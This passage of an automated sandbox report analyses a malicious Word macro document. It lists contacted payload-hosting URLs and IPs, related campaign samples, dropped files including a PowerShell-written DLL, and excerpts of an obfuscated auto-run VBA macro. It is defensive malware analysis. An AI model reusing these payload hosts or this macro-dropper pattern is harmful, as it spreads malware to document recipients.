http://www.hotmail.com/oe	rundll32.exe, 00000006.00000002.2117217440.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111910597.0000000001DA0000.00000002.00000001.sdmp	false		high
https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/	powershell.exe, 00000005.00000002.2113094519.0000000003512000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error-landing	powershell.exe, 00000005.00000002.2114107313.00000000038AD000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2113985934.000000000384E000.00000004.00000001.sdmp	false		high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000006.00000002.2119198742.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2112858407.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113351173.0000000001F77000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	rundll32.exe, 00000006.00000002.2119198742.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2112858407.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113351173.0000000001F77000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000005.00000002.2109131645.00000000023C0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114086718.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2114620463.00000000026D0000.00000002.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000005.00000002.2108564862.00000000002B4000.00000004.00000020.sdmp	false		high
http://shop.elemenslide.com	powershell.exe, 00000005.00000002.2114223175.00000000038E8000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://khanhhoahomnay.net	powershell.exe, 00000005.00000002.2114223175.00000000038E8000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://shop.elemenslide.com/wp-content/n/	powershell.exe, 00000005.00000002.2113094519.0000000003512000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://investor.msn.com/	rundll32.exe, 00000006.00000002.2117217440.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111910597.0000000001DA0000.00000002.00000001.sdmp	false		high
http://sofsuite.com	powershell.exe, 00000005.00000002.2113994382.0000000003863000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://wpsapk.com	powershell.exe, 00000005.00000002.2113972986.0000000003846000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://www.piriform.com/ccleaner	powershell.exe, 00000005.00000002.2108564862.00000000002B4000.00000004.00000020.sdmp	false		high
http://www.%s.comPA	powershell.exe, 00000005.00000002.2109131645.00000000023C0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114086718.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2114620463.00000000026D0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
210.86.239.69	unknown	Viet Nam	24173	NETNAM-AS-APNetnamCompanyVN	true
209.59.139.39	unknown	United States	32244	LIQUIDWEBUS	true
104.27.144.251	unknown	United States	13335	CLOUDFLARENETUS	true
104.18.61.59	unknown	United States	13335	CLOUDFLARENETUS	true
5.2.136.90	unknown	Romania	8708	RCS-RDS73-75DrStaicoviciRO	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	336491
Start date:	06.01.2021
Start time:	08:40:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Documenten_9274874 8574977265.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@24/8@7/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 85.5% (good quality ratio 82%) Quality average: 74.3% Quality standard deviation: 25.5%
HCA Information:	Successful, ratio: 92% Number of executed functions: 133 Number of non-executed functions: 90
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:41:42	API Interceptor	1x Sleep call for process: msg.exe modified
08:41:43	API Interceptor	67x Sleep call for process: powershell.exe modified
08:41:51	API Interceptor	908x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
210.86.239.69	pack-91089 416755919.doc	Get hash	malicious	Browse	khanhhoahomnay.net/wordpress/CGMC/
209.59.139.39	pack-91089 416755919.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	Adjunto.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	NQN0244_012021.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	Scan-0767672.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	Documento-2021.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	info_39534.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	http://btxtfnereq4mf3x3q1eq1sdudvhhiurr.www4.me	Get hash	malicious	Browse	cirugiaesteticamexico.medicainspira.com/wordpress/wp-content/upgrade/i/googlephotos/album/
104.27.144.251	Adjunto.doc	Get hash	malicious	Browse	sofsuite.com/wp-includes/2jm3nIk/
	NQN0244_012021.doc	Get hash	malicious	Browse	sofsuite.com/wp-includes/2jm3nIk/
	Scan-0767672.doc	Get hash	malicious	Browse	sofsuite.com/wp-includes/2jm3nIk/
104.18.61.59	pack-91089 416755919.doc	Get hash	malicious	Browse	wpsapk.com/wp-admin/v/
104.18.61.59	4560 2021 UE_9893.doc	Get hash	malicious	Browse	wpsapk.com/wp-admin/v/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
wpsapk.com	pack-91089 416755919.doc	Get hash	malicious	Browse	104.18.61.59
	Adjunto.doc	Get hash	malicious	Browse	104.18.60.59
	NQN0244_012021.doc	Get hash	malicious	Browse	104.18.60.59
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	104.18.61.59
	Scan-0767672.doc	Get hash	malicious	Browse	104.18.60.59
	Documento-2021.doc	Get hash	malicious	Browse	172.67.141.14
	info_39534.doc	Get hash	malicious	Browse	172.67.141.14
veterinariadrpopui.com	pack-91089 416755919.doc	Get hash	malicious	Browse	209.59.139.39
	Adjunto.doc	Get hash	malicious	Browse	209.59.139.39
	NQN0244_012021.doc	Get hash	malicious	Browse	209.59.139.39
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	209.59.139.39
	Scan-0767672.doc	Get hash	malicious	Browse	209.59.139.39
	Documento-2021.doc	Get hash	malicious	Browse	209.59.139.39
	info_39534.doc	Get hash	malicious	Browse	209.59.139.39
sofsuite.com	pack-91089 416755919.doc	Get hash	malicious	Browse	104.27.145.251
	Adjunto.doc	Get hash	malicious	Browse	104.27.144.251
	NQN0244_012021.doc	Get hash	malicious	Browse	104.27.144.251
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	104.27.145.251
	Scan-0767672.doc	Get hash	malicious	Browse	104.27.144.251
	Documento-2021.doc	Get hash	malicious	Browse	104.27.145.251
	info_39534.doc	Get hash	malicious	Browse	172.67.158.72
khanhhoahomnay.net	pack-91089 416755919.doc	Get hash	malicious	Browse	210.86.239.69

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NETNAM-AS-APNetnamCompanyVN	pack-91089 416755919.doc	Get hash	malicious	Browse	210.86.239.69
CLOUDFLARENETUS	eTrader-0.1.0.exe	Get hash	malicious	Browse	104.23.99.190
	pack-91089 416755919.doc	Get hash	malicious	Browse	104.18.61.59
	Payment Documents.xls	Get hash	malicious	Browse	104.22.1.232
	Shipping Document PLBL003534.xls	Get hash	malicious	Browse	104.22.1.232
	QPI-01458.exe	Get hash	malicious	Browse	172.67.188.154
	LITmNphcCA.exe	Get hash	malicious	Browse	104.28.5.151
	http://fake-cash-app-screenshot-generator.hostforjusteasy.fun	Get hash	malicious	Browse	172.67.179.45
	http://download2224.mediafire.com/5rqvtr7atabg/4ufxk777x7qfcdd/FastStoneCapturePortableTW_9.0_azo.exe	Get hash	malicious	Browse	104.16.203.237
	http://click.freshwaterlive.info/campaign/clicked/MjgzNjAxMzU%3D__MTAxOA%3D%3D__MjY3NzY5Ng%3D%3D__MjI2/aHR0cDovL2JpdC5seS8ySk1GMUJk?c=28360135	Get hash	malicious	Browse	104.16.19.94
	https://awattorneys-my.sharepoint.com/:b:/p/fgalante/EcRfEpzLM_tOh_Roewbwm9oB4JarWh_30QaPZLGUdNbnuw?e=4%3aqmwocp&at=9	Get hash	malicious	Browse	104.16.18.94
	http://reppoflag.net/2307e0382f77c950a2.js	Get hash	malicious	Browse	172.64.170.19
	https://firebasestorage.googleapis.com/v0/b/blckaxe.appspot.com/o/general%20page.html?alt=media&token=b4029a1b-78f5-43ff-a7eb-d4555ad6a60e#kymo@willowoodusa.com	Get hash	malicious	Browse	104.16.18.94
	http://hoquetradersltd.com/jordanbruce/index.php	Get hash	malicious	Browse	104.16.18.94
	https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_Jg	Get hash	malicious	Browse	104.18.70.113
	https://preview.hs-sites.com/_hcms/preview/template/multi?domain=undefined&hs_preview_key=SlyW7XnGAffndKslJ_Oq0Q&portalId=8990448&tc_deviceCategory=undefined&template_file_path=mutli/RFQ.html	Get hash	malicious	Browse	104.16.115.104
	HSBC Payment Advice - HSBC67628473234[20201412].exe	Get hash	malicious	Browse	172.67.156.125
	http://search.hwatchtvnow.co	Get hash	malicious	Browse	104.18.225.52
	https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_Jg	Get hash	malicious	Browse	104.18.70.113
	http://p1.pagewiz.net/w5c8j120/	Get hash	malicious	Browse	104.16.19.94
	Og8qU1smzy.exe	Get hash	malicious	Browse	162.159.138.232
LIQUIDWEBUS	pack-91089 416755919.doc	Get hash	malicious	Browse	209.59.139.39
	https://securemail.bridgepointeffect.com/	Get hash	malicious	Browse	69.167.167.26
	Adjunto.doc	Get hash	malicious	Browse	209.59.139.39
	NQN0244_012021.doc	Get hash	malicious	Browse	209.59.139.39
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	209.59.139.39
	Scan-0767672.doc	Get hash	malicious	Browse	209.59.139.39
	Documento-2021.doc	Get hash	malicious	Browse	209.59.139.39
	info_39534.doc	Get hash	malicious	Browse	209.59.139.39
	https://encrypt.idnmazate.org/	Get hash	malicious	Browse	67.225.177.41
	Nuevo pedido.exe	Get hash	malicious	Browse	209.188.81.142
	https://6354mortgagestammp.com/	Get hash	malicious	Browse	69.16.199.206
	rib.exe	Get hash	malicious	Browse	72.52.175.20
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fsecuremail.danchihosassociates.com&c=E,1,HOuENPlSucTdSUxKwjhrlo_5dPC7J6R1N-Gq03z50mu0n-SbGg9k6UcvRdnb2hWVC0JKp04hBPt2pBkJTi_IhWBa5JSs0U_QUfg3Hl_nTWTxJyTIR8N3&typo=1	Get hash	malicious	Browse	67.225.158.30
	messaggio 2912.doc	Get hash	malicious	Browse	67.227.152.97
	8415051-122020.doc	Get hash	malicious	Browse	67.227.152.97
	Mensaje 900-777687.doc	Get hash	malicious	Browse	67.227.152.97
	088-29-122020-522-0590.doc	Get hash	malicious	Browse	67.227.152.97
	MENSAJE KCW_9805910.doc	Get hash	malicious	Browse	67.227.152.97
	https://image-grafix.com/0098/099/	Get hash	malicious	Browse	72.52.133.164
	Info-29.doc	Get hash	malicious	Browse	67.227.152.97

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24B14A20-30CA-4646-ACFF-79FC9E14ADCB}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbWwWl:sZ
MD5:	3B7B4F5326139F48EFA0AAE509E2FE58
SHA1:	209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
SHA-256:	D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
SHA-512:	C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Documenten_9274874 8574977265.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Wed Jan 6 15:41:39 2021, length=169472, window=hide
Category:	dropped
Size (bytes):	2218
Entropy (8bit):	4.52031015907064
Encrypted:	false
SSDEEP:	48:8w9/XTFGqiTDpFTkfQh2w9/XTFGqiTDpFTkfQ/:8e/XJGqiTPkfQh2e/XJGqiTPkfQ/
MD5:	B17DC310D98D63554C46FC3941DB54B6
SHA1:	649AE504DDC7A8D11860E652AC2A34139CAA9CA7
SHA-256:	51150342F6F39BD85F79F3B1EE96039C170A866C3C9D979F88730B247BC3DEE1
SHA-512:	87A3F3B1134C167880D7E83D8D1A51A4F0DBA77CBC710E407115E8BE839BBA64FFD0EF4220A4B284554EAC6B7C38696E2EE3535FFBBE3450D224561DABCE0D0F
Malicious:	false
Preview:	L..................F.... ...+....{..+....{..{M..J................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....&R4. .DOCUME~1.DOC..p.......Q.y.Q.y...8.....................D.o.c.u.m.e.n.t.e.n._.9.2.7.4.8.7.4. .8.5.7.4.9.7.7.2.6.5...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\585948\Users.user\Desktop\Documenten_9274874 8574977265.doc.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.o.c.u.m.e.n.t.e.n._.9.2.7.4.8.7.4. .8.5.7.4.9.7.7.2.6.5...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	125
Entropy (8bit):	4.610236817470547
Encrypted:	false
SSDEEP:	3:M1cGs2sDMXC5S/2sDMXCmX1cGs2sDMXCv:MeGBsDMXASOsDMXWGBsDMXs
MD5:	3D2E8EC3F1CA9A70956CE14219313C54
SHA1:	750CCFF3F8A745E27BA1CC0155317FA4CF92C1BF
SHA-256:	FE1C73885AB2206D64E3816E0531C5E0A20A80DC19BB3C2AF5AFEDC7D82CEAA8
SHA-512:	BADE8609937C4CEA9DF37FB3FA5DA3D2217B24ED6B5E26B66B7AD420CE6E616F61A6142B06222EBFA015FCE1DB1671957835615206EBC913374E9872B078662A
Malicious:	false
Preview:	[doc]..Documenten_9274874 8574977265.LNK=0..Documenten_9274874 8574977265.LNK=0..[doc]..Documenten_9274874 8574977265.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\326ZWUELWFFB39L2QTD0.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.592286637846877
Encrypted:	false
SSDEEP:	96:chQCsMqaqvsqvJCwoBz8hQCsMqaqvsEHyqvJCwor/z2QYXHyf8H7lUVLIu:cyzoBz8ynHnor/z22f8HcIu
MD5:	A8C2271DBBFFC191D57EF76E27DFBFEB
SHA1:	501E45682B06A0A369414DB55E2D36A757E5EC3D
SHA-256:	3DE0E3C5F222097DEB9242C5F2CF91CC2A3DF2AB5A4298FB7A19E1104A31EA50
SHA-512:	7756ABB0FE87117CB85D54DDEAC18CE905079BE294D223D94E45E4FBE6BE258ED56F1BD2D7C0F5F1C6F7084E398C81D2F6FAA6118F0F0E721123025C563E03F1
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\~$cumenten_9274874 8574977265.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	200625
Entropy (8bit):	7.475407795829527
Encrypted:	false
SSDEEP:	3072:CdawbpDnn9FfrNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:Cdasl9FTaBYF0nVp2MJHybR8dS9
MD5:	27B90A9C9A832855AD22355AB1FED5F1
SHA1:	85E188EDAF94C30339EA5489E21E957AD3E7CFE0
SHA-256:	18F4F9E98C0776859B927A074368D9DF35285C29C9065E23D3332623F8466D6E
SHA-512:	F5773646FE1B8A6912818EC93ED5FF3BFBC1F243B04A2D9BC67D47256D892B368015CC0B32980A8F78C073AABA5291927329313118C27DF99D092C2D3C748EB0
Malicious:	false
Preview:	<!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site \| Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Ohio Avon Montenegro Saint Pierre and Miquelon Human Industrial & Shoes Park online Beauty, Kids & Toys users, Author: Mohamed Laurent, Template: Normal.dotm, Last Saved By: Victor Carre, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 10:15:00 2021, Last Saved Time/Date: Tue Jan 5 10:15:00 2021, Number of Pages: 1, Number of Words: 2640, Number of Characters: 15049, Security: 8
Entropy (8bit):	6.707907841720089
TrID:	Microsoft Word document (32009/1) 79.99% Generic OLE2 / Multistream Compound File (8008/1) 20.01%
File name:	Documenten_9274874 8574977265.doc
File size:	168700
MD5:	bc3ed27ffbbac4cc7695d46ebc3b83f1
SHA1:	ef1d0558f18c3b211e9cbd47b95ec495ddebac14
SHA256:	52e89702b8ccddf31e9439639ca20f45dc8e5ef0ea74312573112605b726df1d
SHA512:	3969a1082adbf9431e6b9a61dfb4d394bd027ad2ebdbfcca8ac3718a616bfd476c4f638d82d6a8d2b0282c5934874d7b763cd385cc11f4b298f811c99c6c0f7b
SSDEEP:	3072:4D9ufstRUUKSns8T00JSHUgteMJ8qMD7gU:4D9ufsfgIf0pLU
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Documenten_9274874 8574977265.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:	Ohio Avon Montenegro Saint Pierre and Miquelon Human Industrial & Shoes Park online Beauty, Kids & Toys users
Author:	Mohamed Laurent
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	Victor Carre
Revion Number:	1
Total Edit Time:	0
Create Time:	2021-01-05 10:15:00
Last Saved Time:	2021-01-05 10:15:00
Number of Pages:	1
Number of Words:	2640
Number of Characters:	15049
Creating Application:	Microsoft Office Word
Security:	8

Document Summary
Document Code Page:	-535
Number of Lines:	125
Number of Paragraphs:	35
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	917504

Streams with VBA

VBA File Name: A5gd21klfqu9c6rs, Stream Size: 1117

General
Stream Path:	Macros/VBA/A5gd21klfqu9c6rs
VBA File Name:	A5gd21klfqu9c6rs
Stream Size:	1117
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 49 85 f4 e6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
Private
VB_Exposed
Attribute
VB_Creatable
VB_Name
Document_open()
VB_Customizable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_TemplateDerived

VBA Code

Attribute VB_Name = "A5gd21klfqu9c6rs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
G8xesq0b8jlsfrsp
End Sub

VBA File Name: Owppnp8hah4xo788, Stream Size: 17915

General
Stream Path:	Macros/VBA/Owppnp8hah4xo788
VBA File Name:	Owppnp8hah4xo788
Stream Size:	17915
Data ASCII:	. . . . . . . . . \| . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . I . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 7c 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 83 06 00 00 a3 30 00 00 00 00 00 00 01 00 00 00 49 85 65 07 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
DpYbmDA
oAaNlB
vrYYHIDxI
WTbkNqFa
Object
RjiQHRA
"bBmgOCvPPojGGC"
MNihxICY
DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
GfRPP
tWcKo
OMZxxg
"lwWhZGEasjsS"
"deVdMyoREdgzCaJb"
